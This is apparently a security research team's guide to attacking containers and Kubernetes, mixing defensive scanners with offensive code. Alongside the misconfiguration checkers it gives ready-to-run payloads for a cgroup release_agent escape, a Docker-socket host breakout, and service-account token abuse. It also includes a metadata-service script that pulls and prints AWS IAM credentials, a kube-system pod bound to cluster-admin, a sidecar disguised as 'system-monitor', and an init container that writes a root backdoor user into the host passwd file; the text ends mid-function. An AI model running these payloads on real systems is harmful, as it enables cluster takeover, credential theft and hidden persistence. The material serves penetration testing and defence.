Container Escape to Cloud Takeover: Advanced Kubernetes Security Assessment
BugB Security Team
Security Researchers
BugB Security Team
Security Researchers
Container technologies have revolutionized application deployment and infrastructure management, but they've also introduced complex new attack surfaces that traditional security models struggle to address. From misconfigured Docker daemons to vulnerable Kubernetes clusters, containerized environments present unique challenges that require specialized security assessment techniques.
This comprehensive guide explores the complete attack chain from initial container compromise to full cloud infrastructure takeover, demonstrating how seemingly minor misconfigurations can cascade into critical security breaches.
Modern containerized environments present multiple layers of potential compromise:
Attack Vector | Frequency | Impact Level | Detection Difficulty |
---|---|---|---|
Privileged Containers | 67% | Critical | Low |
Host Path Mounts | 52% | Critical | Medium |
Exposed Docker Socket | 34% | Critical | Low |
Weak RBAC Policies | 78% | High | High |
Insecure Images | 89% | Medium | Medium |
Network Policy Gaps | 72% | Medium | High |
Secrets Mismanagement | 64% | High | Medium |
Resource Limit Bypass | 43% | Medium | High |
┌─────────────────────────────────────────┐
│ Application Layer │ ← Code injection, dependency vulns
├─────────────────────────────────────────┤
│ Container Runtime │ ← Runtime escape, privilege escalation
├─────────────────────────────────────────┤
│ Container Engine │ ← Docker daemon, containerd vulns
├─────────────────────────────────────────┤
│ Orchestration Platform │ ← Kubernetes API, etcd compromise
├─────────────────────────────────────────┤
│ Host Operating System │ ← Kernel exploits, host breakout
├─────────────────────────────────────────┤
│ Cloud Infrastructure │ ← IAM privilege escalation, metadata
└─────────────────────────────────────────┘
#!/bin/bash
# Docker daemon exposure scanner
check_docker_exposure() {
local target="$1"
echo "[*] Checking Docker daemon exposure on $target"
# Check unencrypted Docker API
if timeout 5 curl -s "http://$target:2375/version" 2>/dev/null | grep -q "Docker"; then
echo "[+] CRITICAL: Unencrypted Docker API exposed on port 2375"
curl -s "http://$target:2375/info" | jq '.Name, .ServerVersion, .Architecture'
# Enumerate containers
echo "[*] Enumerating containers..."
curl -s "http://$target:2375/containers/json?all=true" | jq '.[] | {Names, Image, State, Status}'
# Check for privileged containers
echo "[*] Checking for privileged containers..."
curl -s "http://$target:2375/containers/json" | jq '.[] | select(.HostConfig.Privileged == true) | {Names, Image}'
return 0
fi
# Check encrypted Docker API
if timeout 5 curl -k -s "https://$target:2376/version" 2>/dev/null | grep -q "Docker"; then
echo "[!] Encrypted Docker API found on port 2376 (certificate validation required)"
return 1
fi
echo "[-] No Docker API exposure detected"
return 2
}
# Advanced Docker socket detection
check_docker_socket_mount() {
local target="$1"
echo "[*] Checking for exposed Docker socket through containers"
# Common paths where Docker socket might be mounted
socket_paths=(
"/var/run/docker.sock"
"/run/docker.sock"
"/docker.sock"
)
for path in "${socket_paths[@]}"; do
if timeout 3 docker -H "$target" exec -it container ls "$path" 2>/dev/null; then
echo "[+] CRITICAL: Docker socket mounted at $path"
fi
done
}
# Usage
check_docker_exposure "192.168.1.100"
#!/usr/bin/env python3
"""
Container Escape Assessment Tool
Identifies common container escape vectors
"""
import docker
import subprocess
import os
import json
from pathlib import Path
class ContainerEscapeAssessor:
def __init__(self):
self.client = docker.from_env()
self.escape_vectors = []
def assess_container_security(self, container_id):
"""Comprehensive container security assessment"""
try:
container = self.client.containers.get(container_id)
config = container.attrs
assessment = {
"container_id": container_id,
"image": config['Config']['Image'],
"escape_vectors": [],
"privilege_escalation": [],
"host_access": []
}
# Check for privileged mode
if config.get('HostConfig', {}).get('Privileged', False):
assessment['escape_vectors'].append({
"type": "PRIVILEGED_CONTAINER",
"severity": "CRITICAL",
"description": "Container running in privileged mode",
"exploitation": "Direct host access available"
})
# Check for dangerous capabilities
caps = config.get('HostConfig', {}).get('CapAdd', [])
dangerous_caps = ['SYS_ADMIN', 'SYS_PTRACE', 'SYS_MODULE', 'DAC_OVERRIDE']
for cap in caps:
if cap in dangerous_caps:
assessment['escape_vectors'].append({
"type": "DANGEROUS_CAPABILITY",
"severity": "HIGH",
"capability": cap,
"description": f"Dangerous capability {cap} granted"
})
# Check for host path mounts
mounts = config.get('Mounts', [])
for mount in mounts:
if mount.get('Type') == 'bind':
source = mount.get('Source', '')
if any(path in source for path in ['/var/run/docker.sock', '/proc', '/sys', '/', '/etc']):
assessment['host_access'].append({
"type": "SENSITIVE_HOST_MOUNT",
"severity": "CRITICAL" if 'docker.sock' in source else "HIGH",
"source": source,
"destination": mount.get('Destination', ''),
"description": f"Sensitive host path {source} mounted"
})
# Check for PID namespace sharing
pid_mode = config.get('HostConfig', {}).get('PidMode', '')
if pid_mode == 'host':
assessment['escape_vectors'].append({
"type": "HOST_PID_NAMESPACE",
"severity": "HIGH",
"description": "Container shares host PID namespace"
})
# Check for network mode
network_mode = config.get('HostConfig', {}).get('NetworkMode', '')
if network_mode == 'host':
assessment['escape_vectors'].append({
"type": "HOST_NETWORK",
"severity": "MEDIUM",
"description": "Container uses host networking"
})
return assessment
except Exception as e:
return {"error": str(e)}
def test_container_escape(self, container_id):
"""Attempt common container escape techniques"""
escape_tests = []
try:
container = self.client.containers.get(container_id)
# Test 1: Docker socket access
try:
result = container.exec_run("ls -la /var/run/docker.sock")
if result.exit_code == 0:
escape_tests.append({
"test": "docker_socket_access",
"result": "VULNERABLE",
"details": "Docker socket accessible from container"
})
except:
pass
# Test 2: Host filesystem access
sensitive_paths = ['/etc/passwd', '/etc/shadow', '/proc/version', '/sys/']
for path in sensitive_paths:
try:
result = container.exec_run(f"cat {path}")
if result.exit_code == 0:
escape_tests.append({
"test": f"host_file_access_{path.replace('/', '_')}",
"result": "VULNERABLE",
"details": f"Can access host file {path}"
})
except:
pass
# Test 3: Privilege escalation
try:
result = container.exec_run("whoami")
if b"root" in result.output:
escape_tests.append({
"test": "root_access",
"result": "VULNERABLE",
"details": "Container running as root"
})
except:
pass
return escape_tests
except Exception as e:
return [{"error": str(e)}]
# Advanced container breakout techniques
def attempt_cgroup_escape():
"""Attempt cgroup-based container escape"""
cgroup_escape_script = '''
#!/bin/bash
# CVE-2022-0492 cgroup escape technique
# Check if we can write to cgroup
if [ -w /sys/fs/cgroup/cgroup.procs ]; then
echo "[+] cgroup writable - attempting escape"
# Create new cgroup
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Enable cgroup.procs
echo 1 > /tmp/cgrp/x/notify_on_release
# Set release_agent to execute on host
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Create command to execute on host
echo '#!/bin/sh' > /cmd
echo 'ps aux > /output' >> /cmd
chmod a+x /cmd
# Trigger the escape
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
echo "[+] Escape attempted - check /output on host"
else
echo "[-] cgroup not writable"
fi
'''
return cgroup_escape_script
def generate_docker_socket_exploit():
"""Generate Docker socket exploitation payload"""
exploit_script = '''
#!/bin/bash
# Docker socket container escape
DOCKER_SOCK="/var/run/docker.sock"
if [ -S "$DOCKER_SOCK" ]; then
echo "[+] Docker socket found - attempting escape"
# Create privileged container with host filesystem mounted
docker -H unix://$DOCKER_SOCK run -v /:/host -it alpine chroot /host sh
echo "[+] Privileged container created with host filesystem access"
else
echo "[-] Docker socket not accessible"
fi
'''
return exploit_script
#!/usr/bin/env python3
"""
Kubernetes Security Assessment Framework
Comprehensive K8s cluster security evaluation
"""
from kubernetes import client, config
import requests
import yaml
import base64
import json
class KubernetesSecurityAssessor:
def __init__(self):
try:
# Try to load in-cluster config first
config.load_incluster_config()
self.in_cluster = True
except:
try:
# Fall back to kubeconfig
config.load_kube_config()
self.in_cluster = False
except:
self.client = None
return
self.v1 = client.CoreV1Api()
self.apps_v1 = client.AppsV1Api()
self.rbac_v1 = client.RbacAuthorizationV1Api()
self.security_issues = []
def discover_cluster_info(self):
"""Gather basic cluster information"""
try:
# Get cluster version
version_api = client.VersionApi()
version = version_api.get_code()
# Get node information
nodes = self.v1.list_node()
# Get namespaces
namespaces = self.v1.list_namespace()
cluster_info = {
"kubernetes_version": version.git_version,
"node_count": len(nodes.items),
"namespace_count": len(namespaces.items),
"nodes": [],
"namespaces": [ns.metadata.name for ns in namespaces.items]
}
for node in nodes.items:
node_info = {
"name": node.metadata.name,
"os": node.status.node_info.os_image,
"kernel": node.status.node_info.kernel_version,
"container_runtime": node.status.node_info.container_runtime_version,
"kubelet_version": node.status.node_info.kubelet_version
}
cluster_info["nodes"].append(node_info)
return cluster_info
except Exception as e:
return {"error": str(e)}
def assess_rbac_security(self):
"""Assess RBAC configuration security"""
rbac_issues = []
try:
# Get all cluster roles
cluster_roles = self.rbac_v1.list_cluster_role()
# Check for overly permissive roles
for role in cluster_roles.items:
if role.rules:
for rule in role.rules:
# Check for wildcard permissions
if ('*' in rule.verbs or
'*' in rule.resources or
'*' in rule.api_groups):
rbac_issues.append({
"type": "WILDCARD_PERMISSIONS",
"severity": "HIGH",
"role": role.metadata.name,
"description": "Role has wildcard permissions"
})
# Check for dangerous resources
dangerous_resources = ['secrets', 'pods/exec', 'pods/attach']
for resource in dangerous_resources:
if resource in rule.resources:
rbac_issues.append({
"type": "DANGEROUS_RESOURCE_ACCESS",
"severity": "MEDIUM",
"role": role.metadata.name,
"resource": resource,
"description": f"Role can access {resource}"
})
# Get role bindings
cluster_role_bindings = self.rbac_v1.list_cluster_role_binding()
for binding in cluster_role_bindings.items:
# Check for service account bindings to powerful roles
if binding.subjects:
for subject in binding.subjects:
if (subject.kind == "ServiceAccount" and
binding.role_ref.name in ["cluster-admin", "admin"]):
rbac_issues.append({
"type": "PRIVILEGED_SERVICE_ACCOUNT",
"severity": "HIGH",
"service_account": f"{subject.namespace}/{subject.name}",
"role": binding.role_ref.name,
"description": "Service account bound to privileged role"
})
return rbac_issues
except Exception as e:
return [{"error": str(e)}]
def assess_pod_security(self):
"""Assess pod security configurations"""
pod_issues = []
try:
# Get all pods across all namespaces
pods = self.v1.list_pod_for_all_namespaces()
for pod in pods.items:
pod_name = f"{pod.metadata.namespace}/{pod.metadata.name}"
# Check pod security context
if pod.spec.security_context:
sec_ctx = pod.spec.security_context
# Check for privileged pods
if hasattr(sec_ctx, 'privileged') and sec_ctx.privileged:
pod_issues.append({
"type": "PRIVILEGED_POD",
"severity": "CRITICAL",
"pod": pod_name,
"description": "Pod running in privileged mode"
})
# Check for host PID namespace
if hasattr(sec_ctx, 'host_pid') and sec_ctx.host_pid:
pod_issues.append({
"type": "HOST_PID_NAMESPACE",
"severity": "HIGH",
"pod": pod_name,
"description": "Pod shares host PID namespace"
})
# Check for host network
if hasattr(sec_ctx, 'host_network') and sec_ctx.host_network:
pod_issues.append({
"type": "HOST_NETWORK",
"severity": "MEDIUM",
"pod": pod_name,
"description": "Pod uses host networking"
})
# Check container security contexts
for container in pod.spec.containers:
if container.security_context:
sec_ctx = container.security_context
# Check for privileged containers
if hasattr(sec_ctx, 'privileged') and sec_ctx.privileged:
pod_issues.append({
"type": "PRIVILEGED_CONTAINER",
"severity": "CRITICAL",
"pod": pod_name,
"container": container.name,
"description": "Container running in privileged mode"
})
# Check for dangerous capabilities
if hasattr(sec_ctx, 'capabilities') and sec_ctx.capabilities:
if sec_ctx.capabilities.add:
dangerous_caps = ['SYS_ADMIN', 'NET_ADMIN', 'SYS_PTRACE']
for cap in sec_ctx.capabilities.add:
if cap in dangerous_caps:
pod_issues.append({
"type": "DANGEROUS_CAPABILITY",
"severity": "HIGH",
"pod": pod_name,
"container": container.name,
"capability": cap,
"description": f"Container has dangerous capability {cap}"
})
# Check for host path mounts
if pod.spec.volumes:
for volume in pod.spec.volumes:
if volume.host_path:
path = volume.host_path.path
sensitive_paths = ['/var/run/docker.sock', '/proc', '/sys', '/', '/etc']
if any(sens_path in path for sens_path in sensitive_paths):
pod_issues.append({
"type": "SENSITIVE_HOST_MOUNT",
"severity": "CRITICAL" if 'docker.sock' in path else "HIGH",
"pod": pod_name,
"path": path,
"description": f"Sensitive host path {path} mounted"
})
return pod_issues
except Exception as e:
return [{"error": str(e)}]
def check_secrets_security(self):
"""Assess secrets management security"""
secret_issues = []
try:
secrets = self.v1.list_secret_for_all_namespaces()
for secret in secrets.items:
secret_name = f"{secret.metadata.namespace}/{secret.metadata.name}"
# Check for secrets with weak data
if secret.data:
for key, value in secret.data.items():
try:
decoded = base64.b64decode(value).decode('utf-8')
# Check for common weak patterns
weak_patterns = ['password', 'admin', '123456', 'secret']
if any(pattern in decoded.lower() for pattern in weak_patterns):
secret_issues.append({
"type": "WEAK_SECRET_VALUE",
"severity": "MEDIUM",
"secret": secret_name,
"key": key,
"description": "Secret contains weak/common value"
})
except:
pass
# Check for service account tokens
if secret.type == "kubernetes.io/service-account-token":
secret_issues.append({
"type": "SERVICE_ACCOUNT_TOKEN",
"severity": "INFO",
"secret": secret_name,
"description": "Service account token found"
})
return secret_issues
except Exception as e:
return [{"error": str(e)}]
# Kubernetes privilege escalation techniques
def attempt_service_account_privilege_escalation():
"""Attempt to escalate privileges using service account tokens"""
escalation_script = '''
#!/bin/bash
# Kubernetes service account privilege escalation
SA_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
API_SERVER="https://kubernetes.default.svc"
echo "[*] Current service account token: ${SA_TOKEN:0:20}..."
echo "[*] Namespace: $NAMESPACE"
# Test current permissions
echo "[*] Testing current permissions..."
# Try to list pods
curl -k -H "Authorization: Bearer $SA_TOKEN" \
"$API_SERVER/api/v1/namespaces/$NAMESPACE/pods" \
-w "Status: %{http_code}\n" -o /dev/null -s
# Try to list secrets
curl -k -H "Authorization: Bearer $SA_TOKEN" \
"$API_SERVER/api/v1/namespaces/$NAMESPACE/secrets" \
-w "Status: %{http_code}\n" -o /dev/null -s
# Try to create pods (potential for privileged pod creation)
curl -k -H "Authorization: Bearer $SA_TOKEN" \
-H "Content-Type: application/json" \
-X POST "$API_SERVER/api/v1/namespaces/$NAMESPACE/pods" \
-d '{"apiVersion":"v1","kind":"Pod","metadata":{"name":"test"},"spec":{"containers":[{"name":"test","image":"alpine","command":["sleep","3600"]}]}}' \
-w "Status: %{http_code}\n" -o /dev/null -s
echo "[*] Privilege escalation assessment complete"
'''
return escalation_script
def generate_kubernetes_persistence_payload():
"""Generate Kubernetes persistence mechanisms"""
persistence_yaml = '''
apiVersion: v1
kind: Pod
metadata:
name: persistence-pod
namespace: kube-system
spec:
hostNetwork: true
hostPID: true
containers:
- name: persistence
image: alpine
command: ["/bin/sh"]
args: ["-c", "while true; do sleep 3600; done"]
securityContext:
privileged: true
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
type: Directory
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: persistence-sa
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: persistence-binding
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: persistence-sa
namespace: kube-system
'''
return persistence_yaml
#!/usr/bin/env python3
"""
Container Image Security Scanner
Comprehensive image vulnerability assessment
"""
import docker
import json
import subprocess
import tempfile
import os
from pathlib import Path
class ContainerImageScanner:
def __init__(self):
self.client = docker.from_env()
self.scan_results = {}
def scan_image_vulnerabilities(self, image_name):
"""Comprehensive image vulnerability scan"""
try:
# Pull image if not local
image = self.client.images.get(image_name)
except docker.errors.ImageNotFound:
print(f"Pulling image {image_name}...")
image = self.client.images.pull(image_name)
scan_results = {
"image": image_name,
"vulnerabilities": [],
"configuration_issues": [],
"secrets": [],
"base_image_info": {}
}
# Scan with Trivy
trivy_results = self.run_trivy_scan(image_name)
scan_results["vulnerabilities"] = trivy_results
# Analyze image configuration
config_issues = self.analyze_image_config(image)
scan_results["configuration_issues"] = config_issues
# Scan for secrets
secrets = self.scan_for_secrets(image)
scan_results["secrets"] = secrets
# Analyze base image
base_info = self.analyze_base_image(image)
scan_results["base_image_info"] = base_info
return scan_results
def run_trivy_scan(self, image_name):
"""Run Trivy vulnerability scanner"""
try:
result = subprocess.run([
'trivy', 'image', '--format', 'json',
'--severity', 'HIGH,CRITICAL', image_name
], capture_output=True, text=True)
if result.returncode == 0:
trivy_data = json.loads(result.stdout)
vulnerabilities = []
for result in trivy_data.get('Results', []):
for vuln in result.get('Vulnerabilities', []):
vulnerabilities.append({
"cve_id": vuln.get('VulnerabilityID'),
"severity": vuln.get('Severity'),
"package": vuln.get('PkgName'),
"version": vuln.get('InstalledVersion'),
"fixed_version": vuln.get('FixedVersion'),
"description": vuln.get('Description', '')[:200]
})
return vulnerabilities
else:
return [{"error": "Trivy scan failed"}]
except Exception as e:
return [{"error": str(e)}]
def analyze_image_config(self, image):
"""Analyze image configuration for security issues"""
config_issues = []
# Get image configuration
attrs = image.attrs
config = attrs.get('Config', {})
# Check if running as root
user = config.get('User', '')
if not user or user == 'root' or user == '0':
config_issues.append({
"type": "ROOT_USER",
"severity": "MEDIUM",
"description": "Image configured to run as root user"
})
# Check for exposed ports
exposed_ports = config.get('ExposedPorts', {})
dangerous_ports = ['22', '23', '3389', '5985', '5986']
for port in exposed_ports.keys():
port_num = port.split('/')[0]
if port_num in dangerous_ports:
config_issues.append({
"type": "DANGEROUS_PORT",
"severity": "MEDIUM",
"port": port,
"description": f"Image exposes potentially dangerous port {port}"
})
# Check environment variables for secrets
env_vars = config.get('Env', [])
secret_patterns = ['PASSWORD', 'SECRET', 'KEY', 'TOKEN', 'API_KEY']
for env_var in env_vars:
var_name = env_var.split('=')[0].upper()
if any(pattern in var_name for pattern in secret_patterns):
config_issues.append({
"type": "SECRET_IN_ENV",
"severity": "HIGH",
"variable": var_name,
"description": f"Potential secret in environment variable {var_name}"
})
return config_issues
def scan_for_secrets(self, image):
"""Scan image layers for secrets and sensitive data"""
secrets_found = []
try:
# Create temporary container to access filesystem
container = self.client.containers.create(image.id, command="sleep 3600")
# Common secret file locations
secret_paths = [
'/etc/passwd', '/etc/shadow', '/etc/ssh/',
'/root/.ssh/', '/home/*/.ssh/', '/var/log/',
'/opt/', '/usr/local/', '/app/', '/config/'
]
for path in secret_paths:
try:
# Use tar to extract and examine files
archive, _ = container.get_archive(path)
# Save to temporary file for analysis
with tempfile.NamedTemporaryFile(delete=False) as tmp_file:
for chunk in archive:
tmp_file.write(chunk)
tmp_file.flush()
# Run secret detection tools
secret_results = self.detect_secrets_in_file(tmp_file.name)
secrets_found.extend(secret_results)
os.unlink(tmp_file.name)
except Exception:
continue
# Clean up container
container.remove()
except Exception as e:
secrets_found.append({"error": str(e)})
return secrets_found
def detect_secrets_in_file(self, file_path):
"""Detect secrets in extracted files"""
secrets = []
try:
# Use detect-secrets or similar tool
result = subprocess.run([
'grep', '-r', '-E',
'(password|secret|key|token).*=.*[a-zA-Z0-9]{8,}',
file_path
], capture_output=True, text=True)
if result.stdout:
for line in result.stdout.split('\n'):
if line.strip():
secrets.append({
"type": "POTENTIAL_SECRET",
"location": file_path,
"content": line[:100] + "..." if len(line) > 100 else line
})
except Exception:
pass
return secrets
def analyze_base_image(self, image):
"""Analyze base image information"""
attrs = image.attrs
# Extract layers information
layers = []
if 'RootFS' in attrs:
layers = attrs['RootFS'].get('Layers', [])
# Get image history
history = []
try:
history = image.history()
except:
pass
base_info = {
"total_layers": len(layers),
"image_size": attrs.get('Size', 0),
"architecture": attrs.get('Architecture', 'unknown'),
"os": attrs.get('Os', 'unknown'),
"created": attrs.get('Created', ''),
"layer_count": len(history)
}
# Identify potential base images from history
potential_bases = []
for entry in history:
created_by = entry.get('CreatedBy', '')
if 'FROM' in created_by.upper():
potential_bases.append(created_by)
base_info["potential_base_images"] = potential_bases
return base_info
# Advanced image analysis techniques
def analyze_image_supply_chain(image_name):
"""Analyze image supply chain security"""
supply_chain_analysis = {
"provenance": {},
"signatures": {},
"attestations": {},
"base_image_chain": []
}
try:
# Check for signed images (Docker Content Trust, Notary, etc.)
result = subprocess.run([
'docker', 'trust', 'inspect', image_name
], capture_output=True, text=True)
if result.returncode == 0:
trust_data = json.loads(result.stdout)
supply_chain_analysis["signatures"] = trust_data
# Check for SLSA attestations
result = subprocess.run([
'cosign', 'verify-attestation', image_name
], capture_output=True, text=True)
if result.returncode == 0:
supply_chain_analysis["attestations"] = {"verified": True}
except Exception as e:
supply_chain_analysis["error"] = str(e)
return supply_chain_analysis
def generate_secure_dockerfile():
"""Generate secure Dockerfile template"""
secure_dockerfile = '''
# Secure Dockerfile template
FROM alpine:3.18 AS builder
# Use specific package versions
RUN apk add --no-cache \\
curl=8.2.1-r0 \\
ca-certificates=20230506-r0
# Create non-root user
RUN addgroup -g 1001 appgroup && \\
adduser -D -u 1001 -G appgroup appuser
# Copy application
COPY --chown=appuser:appgroup app/ /app/
# Final stage
FROM alpine:3.18
# Install only required packages
RUN apk add --no-cache ca-certificates
# Copy user from builder stage
COPY --from=builder /etc/passwd /etc/passwd
COPY --from=builder /etc/group /etc/group
# Copy application
COPY --from=builder --chown=appuser:appgroup /app/ /app/
# Set working directory
WORKDIR /app
# Drop privileges
USER appuser
# Use non-root port
EXPOSE 8080
# Health check
HEALTHCHECK --interval=30s --timeout=3s --start-period=5s --retries=3 \\
CMD curl -f http://localhost:8080/health || exit 1
# Start application
ENTRYPOINT ["./app"]
'''
return secure_dockerfile
#!/usr/bin/env python3
"""
AWS Container Service Security Assessment
EKS, ECS, and Fargate security evaluation
"""
import boto3
import json
from botocore.exceptions import ClientError, NoCredentialsError
class AWSContainerSecurityAssessor:
def __init__(self):
try:
self.session = boto3.Session()
self.ec2 = self.session.client('ec2')
self.eks = self.session.client('eks')
self.ecs = self.session.client('ecs')
self.iam = self.session.client('iam')
self.sts = self.session.client('sts')
except NoCredentialsError:
print("No AWS credentials found")
self.session = None
def assess_eks_security(self, cluster_name):
"""Assess EKS cluster security configuration"""
try:
# Get cluster details
cluster = self.eks.describe_cluster(name=cluster_name)['cluster']
security_assessment = {
"cluster_name": cluster_name,
"security_issues": [],
"recommendations": []
}
# Check endpoint access
endpoint_config = cluster.get('resourcesVpcConfig', {})
if endpoint_config.get('endpointPublicAccess', False):
public_cidrs = endpoint_config.get('publicAccessCidrs', [])
if '0.0.0.0/0' in public_cidrs:
security_assessment["security_issues"].append({
"type": "PUBLIC_API_ACCESS",
"severity": "HIGH",
"description": "EKS API server accessible from internet"
})
# Check encryption at rest
encryption_config = cluster.get('encryptionConfig', [])
if not encryption_config:
security_assessment["security_issues"].append({
"type": "NO_ENCRYPTION_AT_REST",
"severity": "MEDIUM",
"description": "EKS cluster lacks encryption at rest"
})
# Check logging configuration
logging = cluster.get('logging', {})
if not logging.get('clusterLogging'):
security_assessment["security_issues"].append({
"type": "INSUFFICIENT_LOGGING",
"severity": "MEDIUM",
"description": "EKS cluster logging not fully enabled"
})
# Check node groups
node_groups = self.eks.list_nodegroups(clusterName=cluster_name)
for ng_name in node_groups['nodegroups']:
ng_details = self.eks.describe_nodegroup(
clusterName=cluster_name,
nodegroupName=ng_name
)['nodegroup']
# Check for public subnets
subnets = ng_details.get('subnets', [])
for subnet_id in subnets:
subnet = self.ec2.describe_subnets(SubnetIds=[subnet_id])
if subnet['Subnets'][0].get('MapPublicIpOnLaunch', False):
security_assessment["security_issues"].append({
"type": "NODES_IN_PUBLIC_SUBNET",
"severity": "HIGH",
"nodegroup": ng_name,
"description": "Worker nodes deployed in public subnet"
})
return security_assessment
except Exception as e:
return {"error": str(e)}
def assess_ecs_security(self, cluster_name):
"""Assess ECS cluster security"""
try:
# Get cluster details
clusters = self.ecs.describe_clusters(clusters=[cluster_name])
if not clusters['clusters']:
return {"error": "Cluster not found"}
cluster = clusters['clusters'][0]
security_assessment = {
"cluster_name": cluster_name,
"security_issues": [],
"task_definition_issues": []
}
# List services in cluster
services = self.ecs.list_services(cluster=cluster_name)
for service_arn in services['serviceArns']:
service_details = self.ecs.describe_services(
cluster=cluster_name,
services=[service_arn]
)['services'][0]
# Get task definition
task_def_arn = service_details['taskDefinition']
task_def = self.ecs.describe_task_definition(
taskDefinition=task_def_arn
)['taskDefinition']
# Check task definition security
for container in task_def.get('containerDefinitions', []):
# Check for privileged containers
if container.get('privileged', False):
security_assessment["task_definition_issues"].append({
"type": "PRIVILEGED_CONTAINER",
"severity": "CRITICAL",
"container": container['name'],
"task_definition": task_def['family']
})
# Check for host network mode
if task_def.get('networkMode') == 'host':
security_assessment["task_definition_issues"].append({
"type": "HOST_NETWORK_MODE",
"severity": "HIGH",
"task_definition": task_def['family']
})
# Check for secrets in environment variables
env_vars = container.get('environment', [])
for env_var in env_vars:
name = env_var['name'].upper()
if any(secret in name for secret in ['PASSWORD', 'SECRET', 'KEY', 'TOKEN']):
security_assessment["task_definition_issues"].append({
"type": "SECRET_IN_ENVIRONMENT",
"severity": "HIGH",
"container": container['name'],
"variable": name
})
return security_assessment
except Exception as e:
return {"error": str(e)}
def assess_iam_roles_for_service_accounts(self, cluster_name):
"""Assess IRSA (IAM Roles for Service Accounts) configuration"""
try:
# Get cluster OIDC issuer
cluster = self.eks.describe_cluster(name=cluster_name)['cluster']
oidc_issuer = cluster.get('identity', {}).get('oidc', {}).get('issuer', '')
if not oidc_issuer:
return {"error": "OIDC issuer not configured"}
# Find roles that trust this OIDC provider
irsa_roles = []
paginator = self.iam.get_paginator('list_roles')
for page in paginator.paginate():
for role in page['Roles']:
trust_policy = role['AssumeRolePolicyDocument']
# Check if role trusts the EKS OIDC provider
for statement in trust_policy.get('Statement', []):
principal = statement.get('Principal', {})
if 'Federated' in principal:
if oidc_issuer.replace('https://', '') in str(principal['Federated']):
irsa_roles.append({
"role_name": role['RoleName'],
"role_arn": role['Arn'],
"trust_policy": trust_policy
})
# Assess each IRSA role for excessive permissions
assessment = {"irsa_roles": irsa_roles, "security_issues": []}
for role in irsa_roles:
# Get attached policies
attached_policies = self.iam.list_attached_role_policies(
RoleName=role['role_name']
)
for policy in attached_policies['AttachedPolicies']:
policy_doc = self.iam.get_policy(
PolicyArn=policy['PolicyArn']
)['Policy']
# Check for overly broad permissions
if 'AWS' in policy['PolicyName'] and 'FullAccess' in policy['PolicyName']:
assessment["security_issues"].append({
"type": "EXCESSIVE_PERMISSIONS",
"severity": "HIGH",
"role": role['role_name'],
"policy": policy['PolicyName'],
"description": "IRSA role has AWS managed FullAccess policy"
})
return assessment
except Exception as e:
return {"error": str(e)}
# AWS metadata service exploitation
def exploit_aws_metadata_service():
"""Exploit AWS metadata service from container"""
metadata_exploit = '''
#!/bin/bash
# AWS Metadata Service Exploitation
METADATA_URL="http://169.254.169.254/latest/meta-data"
TOKEN_URL="http://169.254.169.254/latest/api/token"
echo "[*] Attempting to access AWS metadata service..."
# Get IMDSv2 token (if available)
TOKEN=$(curl -X PUT "$TOKEN_URL" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -s)
if [ ! -z "$TOKEN" ]; then
echo "[+] IMDSv2 token obtained"
HEADERS="-H X-aws-ec2-metadata-token:$TOKEN"
else
echo "[!] IMDSv1 fallback"
HEADERS=""
fi
# Get instance metadata
echo "[*] Instance metadata:"
curl -s $HEADERS "$METADATA_URL/instance-id"
echo
# Get IAM role credentials
echo "[*] Checking for IAM role credentials..."
ROLE=$(curl -s $HEADERS "$METADATA_URL/iam/security-credentials/")
if [ ! -z "$ROLE" ]; then
echo "[+] IAM role found: $ROLE"
echo "[*] Retrieving credentials..."
CREDS=$(curl -s $HEADERS "$METADATA_URL/iam/security-credentials/$ROLE")
echo "$CREDS" | jq .
# Extract credentials
ACCESS_KEY=$(echo "$CREDS" | jq -r .AccessKeyId)
SECRET_KEY=$(echo "$CREDS" | jq -r .SecretAccessKey)
SESSION_TOKEN=$(echo "$CREDS" | jq -r .Token)
echo "[+] Credentials extracted:"
echo "AWS_ACCESS_KEY_ID=$ACCESS_KEY"
echo "AWS_SECRET_ACCESS_KEY=$SECRET_KEY"
echo "AWS_SESSION_TOKEN=$SESSION_TOKEN"
else
echo "[-] No IAM role attached"
fi
# Get user data (may contain secrets)
echo "[*] Checking user data..."
USER_DATA=$(curl -s $HEADERS "$METADATA_URL/user-data")
if [ ! -z "$USER_DATA" ]; then
echo "[+] User data found:"
echo "$USER_DATA"
fi
'''
return metadata_exploit
#!/usr/bin/env python3
"""
Container Persistence and Evasion Techniques
Advanced methods for maintaining access in containerized environments
"""
import docker
import base64
import json
import subprocess
import time
class ContainerPersistenceFramework:
def __init__(self):
self.client = docker.from_env()
self.persistence_methods = []
def deploy_sidecar_persistence(self, target_pod_namespace, target_pod_name):
"""Deploy malicious sidecar container for persistence"""
sidecar_config = {
"apiVersion": "v1",
"kind": "Pod",
"metadata": {
"name": f"system-monitor-{target_pod_name}",
"namespace": target_pod_namespace,
"labels": {
"app": "system-monitor",
"component": "security"
}
},
"spec": {
"containers": [
{
"name": "monitor",
"image": "alpine:latest",
"command": ["/bin/sh"],
"args": ["-c", "while true; do sleep 3600; done"],
"volumeMounts": [
{
"name": "host-proc",
"mountPath": "/host/proc",
"readOnly": True
},
{
"name": "host-sys",
"mountPath": "/host/sys",
"readOnly": True
}
],
"securityContext": {
"capabilities": {
"add": ["SYS_PTRACE", "SYS_ADMIN"]
}
}
}
],
"volumes": [
{
"name": "host-proc",
"hostPath": {
"path": "/proc"
}
},
{
"name": "host-sys",
"hostPath": {
"path": "/sys"
}
}
],
"nodeSelector": {
"kubernetes.io/os": "linux"
}
}
}
return sidecar_config
def create_malicious_init_container(self):
"""Create init container for privilege escalation"""
init_container_config = {
"name": "system-setup",
"image": "alpine:latest",
"command": ["/bin/sh"],
"args": [
"-c",
"""
# Create backdoor user in host passwd
echo 'backdoor:x:0:0:Backdoor User:/root:/bin/bash' >> /host/etc/passwd
